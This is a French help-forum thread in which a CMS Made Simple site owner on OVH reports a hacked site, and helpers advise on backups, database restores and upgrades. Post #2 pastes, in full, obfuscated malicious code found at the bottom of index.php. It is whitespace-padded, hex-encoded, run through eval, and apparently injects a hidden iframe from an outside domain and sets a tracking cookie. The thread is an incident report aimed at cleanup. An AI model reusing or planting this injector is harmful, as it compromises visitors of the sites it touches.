OVH piraté, mon site défigurer, conexion à l'admin cmsms ok mais....

Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
#1
Citation :#~~~~~ DEBUT BLOC A NE PAS SUPPRIMER ~~~~~
#~ Version du CMS: ?
#~ Url du site : http://concierge-privileges.fr/
#~ Hébergeur / Soft : OVH
#~ Informations Système :
#~~~~~ FIN BLOC A NE PAS SUPPRIMER ~~~~~



Bonjour,
j'ai un gros problème sur mon site, OVH c'est fait pirater ses serveurs fin juillet il me semble,
depuis quand je vais sur mon site je voit du code qui apparait dans mon design certaine chose comme un slider n'est plus présent sur la page d'accueil, en inspectant avec firebug je crois que du javascript à été injecter sur mes pages,
je me connecte à mon interface d'admin de cmsms, ça me log bien par contre si je vois le menu d'admin de cmsms les clic sur les différents menu non aucun éffet, je ne peut ni faire la mise à jour ni changer de mot de passe ni avoir accès au page gabarits ou feuille de style je suis complètement déprimé..
au secours !!
merci d'avance de l'aide que vous pourrez m'apporter
#1
Citation :#~~~~~ DEBUT BLOC A NE PAS SUPPRIMER ~~~~~
#~ Version du CMS: ?
#~ Url du site : http://concierge-privileges.fr/
#~ Hébergeur / Soft : OVH
#~ Informations Système :
#~~~~~ FIN BLOC A NE PAS SUPPRIMER ~~~~~



Bonjour,
j'ai un gros problème sur mon site, OVH c'est fait pirater ses serveurs fin juillet il me semble,
depuis quand je vais sur mon site je voit du code qui apparait dans mon design certaine chose comme un slider n'est plus présent sur la page d'accueil, en inspectant avec firebug je crois que du javascript à été injecter sur mes pages,
je me connecte à mon interface d'admin de cmsms, ça me log bien par contre si je vois le menu d'admin de cmsms les clic sur les différents menu non aucun éffet, je ne peut ni faire la mise à jour ni changer de mot de passe ni avoir accès au page gabarits ou feuille de style je suis complètement déprimé..
au secours !!
merci d'avance de l'aide que vous pourrez m'apporter
#2
Si cela peut aider, voici le script en trop que j'ai découvert en bas de l'index.php (je n'y ai accès que par ftp car via panneau d'admin je ne peut plus rien faire..)

Code :
[== JavaScript ==]
#0f2490#
                                                                                                                                                                                                                                                                                                                                                                                                                echo "                                                                                                                                                                                                                                                                                                                                                                                                                <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval(\"St\"+\"ring\");}a=\"74837c7182777d7c2e88888874747436372e89182e846f802e886f772e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e886f773c8180712e4b2e357682827e483d3d74827e3c707a837381797773813c6f73807d3d5c58857c595166603c7e767e3549182e886f773c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e886f773c8182877a733c707d807273802e4b2e353e3549182e886f773c8182877a733c7673777576822e4b2e35477e863549182e886f773c8182877a733c85777282762e4b2e35457e863549182e886f773c8182877a733c7a7374822e4b2e353f7e863549182e886f773c8182877a733c827d7e2e4b2e353f7e86354918182e77742e362f727d71837b737c823c757382537a737b737c82508757723635886f773537372e89182e727d71837b737c823c858077827336354a7277842e77724b6a35886f776a354c4a3d7277844c353749182e727d71837b737c823c757382537a737b737c82508757723635886f7735373c6f7e7e737c725176777a7236886f773749182e8b188b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e89182e846f802e827d726f872e4b2e7c73852e526f8273363749182e846f802e73867e7780732e4b2e7c73852e526f8273363749182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f49182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f87813749182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a837337182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e30303749188b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e89182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e3749182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f49182e77742e362e362e2f81826f80822e372e3434182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e37182e89182e80738283807c2e7c837a7a49182e8b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a49182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e3749182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18\";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss[\"fr\"+\"omCharCode\"].apply(ss,z));</script>";

#/0f2490#
#2
Si cela peut aider, voici le script en trop que j'ai découvert en bas de l'index.php (je n'y ai accès que par ftp car via panneau d'admin je ne peut plus rien faire..)

Code :
[== JavaScript ==]
#0f2490#
                                                                                                                                                                                                                                                                                                                                                                                                                echo "                                                                                                                                                                                                                                                                                                                                                                                                                <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval(\"St\"+\"ring\");}a=\"74837c7182777d7c2e88888874747436372e89182e846f802e886f772e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e886f773c8180712e4b2e357682827e483d3d74827e3c707a837381797773813c6f73807d3d5c58857c595166603c7e767e3549182e886f773c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e886f773c8182877a733c707d807273802e4b2e353e3549182e886f773c8182877a733c7673777576822e4b2e35477e863549182e886f773c8182877a733c85777282762e4b2e35457e863549182e886f773c8182877a733c7a7374822e4b2e353f7e863549182e886f773c8182877a733c827d7e2e4b2e353f7e86354918182e77742e362f727d71837b737c823c757382537a737b737c82508757723635886f773537372e89182e727d71837b737c823c858077827336354a7277842e77724b6a35886f776a354c4a3d7277844c353749182e727d71837b737c823c757382537a737b737c82508757723635886f7735373c6f7e7e737c725176777a7236886f773749182e8b188b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e89182e846f802e827d726f872e4b2e7c73852e526f8273363749182e846f802e73867e7780732e4b2e7c73852e526f8273363749182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f49182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f87813749182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a837337182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e30303749188b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e89182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e3749182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f49182e77742e362e362e2f81826f80822e372e3434182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e37182e89182e80738283807c2e7c837a7a49182e8b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a49182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e3749182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18\";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss[\"fr\"+\"omCharCode\"].apply(ss,z));</script>";

#/0f2490#
#3
Backup
#3
Backup
#4
Salut jean le chauve, quel serait la procédure selon toi pour le backup ma version était 1.11.4 je vais profiter pour mettre en 1.11.7 mais je ne sais pas si on peut faire une sorte de restauration avant de faire la mise a jour ?
Et j'ai une seconde question, si je sauvegarde tout mon contenu via FTP est ce que cela va sauvegarder mon design met textes etc ? Ou sont caché les pages avec les textes dans le FTP.
Merci d'avance.
#4
Salut jean le chauve, quel serait la procédure selon toi pour le backup ma version était 1.11.4 je vais profiter pour mettre en 1.11.7 mais je ne sais pas si on peut faire une sorte de restauration avant de faire la mise a jour ?
Et j'ai une seconde question, si je sauvegarde tout mon contenu via FTP est ce que cela va sauvegarder mon design met textes etc ? Ou sont caché les pages avec les textes dans le FTP.
Merci d'avance.
#5
Citation :Et j'ai une seconde question, si je sauvegarde tout mon contenu via FTP est ce que cela va sauvegarder mon design met textes etc ?

Tout est en base de données sauf bien sur les images... fichiers... qui sont dans le dossier /Uploads


Voir le WIKI Sauvegarder une version de CmsMadeSimple pour le principe
J-C Etiemble v 2.2.xx
#5
Citation :Et j'ai une seconde question, si je sauvegarde tout mon contenu via FTP est ce que cela va sauvegarder mon design met textes etc ?

Tout est en base de données sauf bien sur les images... fichiers... qui sont dans le dossier /Uploads


Voir le WIKI Sauvegarder une version de CmsMadeSimple pour le principe
J-C Etiemble v 2.2.xx
#6
Merci JCE pour la sauvegarde c'est assimiler une fois ls sauvegarde faite je refait une instalation complètes du cms avec la dernière version comme si je repartait de zéro ? Ou plutôt la mise a jour ?
Et si c'est le cas comment je réintègre les fichiers de ma sauvegarde a mon nouveau cms tout propre ?
#6
Merci JCE pour la sauvegarde c'est assimiler une fois ls sauvegarde faite je refait une instalation complètes du cms avec la dernière version comme si je repartait de zéro ? Ou plutôt la mise a jour ?
Et si c'est le cas comment je réintègre les fichiers de ma sauvegarde a mon nouveau cms tout propre ?
#7
Citation :ne fois ls sauvegarde faite je refait une instalation complètes du cms avec la dernière version comme si je repartait de zéro ? Ou plutôt la mise a jour ?

je te conseille de procéder comme indiquer sur le WIKI
Transfert cmsmadesimple
C'est le plus simple et le plus sur Wink avec ta version actuelle

Si tout est OK
faire la mise à jour ensuite
J-C Etiemble v 2.2.xx
#7
Citation :ne fois ls sauvegarde faite je refait une instalation complètes du cms avec la dernière version comme si je repartait de zéro ? Ou plutôt la mise a jour ?

je te conseille de procéder comme indiquer sur le WIKI
Transfert cmsmadesimple
C'est le plus simple et le plus sur Wink avec ta version actuelle

Si tout est OK
faire la mise à jour ensuite
J-C Etiemble v 2.2.xx
#8
Ok merci JCE je vais tester tout ça après le petit déjeuner :lol:
Une petite interrogation lors de la réinstallation du cms sur FTP je coche création des tables et quand je vais importer la base de données de ma sauvegarde cela va écraser les nouvelles tables crées qui sont vide c'est bien ça ?
#8
Ok merci JCE je vais tester tout ça après le petit déjeuner :lol:
Une petite interrogation lors de la réinstallation du cms sur FTP je coche création des tables et quand je vais importer la base de données de ma sauvegarde cela va écraser les nouvelles tables crées qui sont vide c'est bien ça ?
#9
salut,
j'ai fait la réinstalation du site avec le nouveau cmsms 1.11.7 à l'étape 5 j'ai coché créations des tables mais j'ai décocher les gabarits d'exemple, ensuite dans phpmyadmin lorsque j'essai d'importer ma sauvegarde de ma base de données au format gzippé, il me met cet erreur :o !? :

Erreur

Requête SQL:

-- -- Contenu de la table `cms_content` -- INSERT INTO `cms_content` (`content_id`, `content_name`, `type`, `owner_id`, `parent_id`, `template_id`, `item_order`, `hierarchy`, `default_content`, `menu_text`, `content_alias`, `show_in_menu`, `collapsed`, `markup`, `active`, `cachable`, `id_hierarchy`, `hierarchy_path`, `prop_names`, `metadata`, `titleattribute`, `tabindex`, `accesskey`, `last_modified_by`, `create_date`, `modified_date`, `secure`, `page_url`) VALUES (15, 'Accueil ', 'content', 1, -1, 22, 1, '00001', 1, 'Accueil', 'accueil', 1, 1, 'html', 1, 1, '15', 'accueil', 'target,pagedata,extra1,extra2,extra3,image,thumbnail,searchable,disable_wysiwyg,image1,content_en', '', 'Présentation', '', '1', 1, '2006-07-25 21:22:31', '2013-07-27 23:14:57', 0, ''), (60, 'Mentions légales', 'content', 1, -1, 22, 6, '00006', 0, 'Mentions légales', 'mentions', 0, NULL, 'html', 1, 1, '60', 'mentions', 'searchable,extra1,extra2,extra3,pagedata,disable_wysiwyg,image,thumbnail,target,content_e[...]

MySQL a répondu: Documentation
#1062 - Duplicate entry '15' for key 'PRIMARY'
#9
salut,
j'ai fait la réinstalation du site avec le nouveau cmsms 1.11.7 à l'étape 5 j'ai coché créations des tables mais j'ai décocher les gabarits d'exemple, ensuite dans phpmyadmin lorsque j'essai d'importer ma sauvegarde de ma base de données au format gzippé, il me met cet erreur :o !? :

Erreur

Requête SQL:

-- -- Contenu de la table `cms_content` -- INSERT INTO `cms_content` (`content_id`, `content_name`, `type`, `owner_id`, `parent_id`, `template_id`, `item_order`, `hierarchy`, `default_content`, `menu_text`, `content_alias`, `show_in_menu`, `collapsed`, `markup`, `active`, `cachable`, `id_hierarchy`, `hierarchy_path`, `prop_names`, `metadata`, `titleattribute`, `tabindex`, `accesskey`, `last_modified_by`, `create_date`, `modified_date`, `secure`, `page_url`) VALUES (15, 'Accueil ', 'content', 1, -1, 22, 1, '00001', 1, 'Accueil', 'accueil', 1, 1, 'html', 1, 1, '15', 'accueil', 'target,pagedata,extra1,extra2,extra3,image,thumbnail,searchable,disable_wysiwyg,image1,content_en', '', 'Présentation', '', '1', 1, '2006-07-25 21:22:31', '2013-07-27 23:14:57', 0, ''), (60, 'Mentions légales', 'content', 1, -1, 22, 6, '00006', 0, 'Mentions légales', 'mentions', 0, NULL, 'html', 1, 1, '60', 'mentions', 'searchable,extra1,extra2,extra3,pagedata,disable_wysiwyg,image,thumbnail,target,content_e[...]

MySQL a répondu: Documentation
#1062 - Duplicate entry '15' for key 'PRIMARY'
#10
Puisque tu as ta bd en gzip, pourquoi as-tu coché "créer les tables".
De plus OVH te permet de récupérer ta bd ET ton FTP jusqu'à une semaine en arrière, j'ai comme l'impression que tu es en train de sauvegarder ton site piraté...
Donc, aucune installation n'est nécessaire, juste aller dans ton administration ovh et demander les 2 backups (bd et ftp) de la semaine passée. Tu n'auras plus qu'à aller sur ton phpMyAdmin, dropper tes anciennes tables et insérer ton backup bd.
#10
Puisque tu as ta bd en gzip, pourquoi as-tu coché "créer les tables".
De plus OVH te permet de récupérer ta bd ET ton FTP jusqu'à une semaine en arrière, j'ai comme l'impression que tu es en train de sauvegarder ton site piraté...
Donc, aucune installation n'est nécessaire, juste aller dans ton administration ovh et demander les 2 backups (bd et ftp) de la semaine passée. Tu n'auras plus qu'à aller sur ton phpMyAdmin, dropper tes anciennes tables et insérer ton backup bd.
#11
ok et si cela fait plus d'une semaine que le site c'est fait pirater, comment on fait ?
#11
ok et si cela fait plus d'une semaine que le site c'est fait pirater, comment on fait ?
#12
[Image: Pendu.gif]
#12
[Image: Pendu.gif]
#13
Citation :#1062 - Duplicate entry '15' for key 'PRIMARY'
ben .... ta table est déja remplie Wink

comme tu as déjà crée tes tables, quand tu importes ma sauvegarde de BD vérifie :
Si ta sauvegarde contient que les données ->dans ce cas vider tes tables ( Option Vider)
Si ta sauvegarde contient les données et structure ->dans ce cas vider tes tables ( Option supprimer)

tu n'as surement pas bien sauvegarder avec les bon paramétrés.
Faut maitriser ces trucs la Wink ce sont des prérequis !
J-C Etiemble v 2.2.xx
#13
Citation :#1062 - Duplicate entry '15' for key 'PRIMARY'
ben .... ta table est déja remplie Wink

comme tu as déjà crée tes tables, quand tu importes ma sauvegarde de BD vérifie :
Si ta sauvegarde contient que les données ->dans ce cas vider tes tables ( Option Vider)
Si ta sauvegarde contient les données et structure ->dans ce cas vider tes tables ( Option supprimer)

tu n'as surement pas bien sauvegarder avec les bon paramétrés.
Faut maitriser ces trucs la Wink ce sont des prérequis !
J-C Etiemble v 2.2.xx
#14
j'ai instaler les fichier ftp de la nouvelle version 1.11.7 toute neuve et avec ça j'ai mis ma base de données mais qui allait avec la version 1.11.4, il y a que 72 table dans cette base de données alors que j'ai vu qu'il y'en avait 82 dans la nouvelle base de données de la version 1.11.7, après avoir supprimer toutes les tables et remis les 72 miennes, le site refonctionne j'ai remis mes images par contre le site est vraiment lent, que ce soit au chagement de page du site mais même dans l'administration, comment on pourrait règler ça ?
#14
j'ai instaler les fichier ftp de la nouvelle version 1.11.7 toute neuve et avec ça j'ai mis ma base de données mais qui allait avec la version 1.11.4, il y a que 72 table dans cette base de données alors que j'ai vu qu'il y'en avait 82 dans la nouvelle base de données de la version 1.11.7, après avoir supprimer toutes les tables et remis les 72 miennes, le site refonctionne j'ai remis mes images par contre le site est vraiment lent, que ce soit au chagement de page du site mais même dans l'administration, comment on pourrait règler ça ?
#15
déjà tu fais ne fais pas ce que je t'ai préconiser !!!
"installer avec ta version actuelle
Si tout est OK
faire la mise à jour ensuite"


Citation : après avoir supprimer toutes les tables et remis les 72 miennes, le site refonctionne j'ai remis mes images par contre le site est vraiment lent
Il faut surement que tu fasses une upgrade http://monsite.fr/cms/install/upgrade.php
J-C Etiemble v 2.2.xx
#15
déjà tu fais ne fais pas ce que je t'ai préconiser !!!
"installer avec ta version actuelle
Si tout est OK
faire la mise à jour ensuite"


Citation : après avoir supprimer toutes les tables et remis les 72 miennes, le site refonctionne j'ai remis mes images par contre le site est vraiment lent
Il faut surement que tu fasses une upgrade http://monsite.fr/cms/install/upgrade.php
J-C Etiemble v 2.2.xx


Atteindre :


Utilisateur(s) parcourant ce sujet : 1 visiteur(s)